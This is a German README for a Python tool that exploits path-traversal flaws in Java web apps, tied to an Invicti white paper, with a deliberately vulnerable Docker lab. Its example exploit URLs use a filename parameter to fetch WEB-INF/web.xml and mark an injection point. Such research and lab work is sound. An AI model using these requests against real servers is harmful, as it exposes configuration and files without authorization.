
Tool zur Unterstützung bei der Ausnutzung von Path-Traversal-Schwachstellen in Java-Webanwendungen
Tool zur Unterstützung bei der Ausnutzung von Path-Traversal-Schwachstellen in Java-Webanwendungen.
Dieses Tool wird in dem Invicti Security White Paper Exploiting path traversal vulnerabilities in Java web applications referenziert.
Für dieses Tool wird Python3 benötigt.
Führen Sie den folgenden Befehl aus:
pip install -r requirements.txt
Geben Sie nach der Installation eine Exploit-URL wie folgt an:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
Die Ergebnisse (heruntergeladene Dateien) sind im Ordner results verfügbar.
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
Im Ordner docker wird eine Webanwendung bereitgestellt, die anfällig für eine Path-Traversal-Schwachstelle ist.
Um zu starten, wechseln Sie in den Ordner docker und führen Sie Folgendes aus:
docker-compose up
Die Anwendung ist unter http://127.0.0.1:8082/vulnerable/ erreichbar.
Um die Path-Traversal-Schwachstelle auszunutzen, besuchen Sie: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml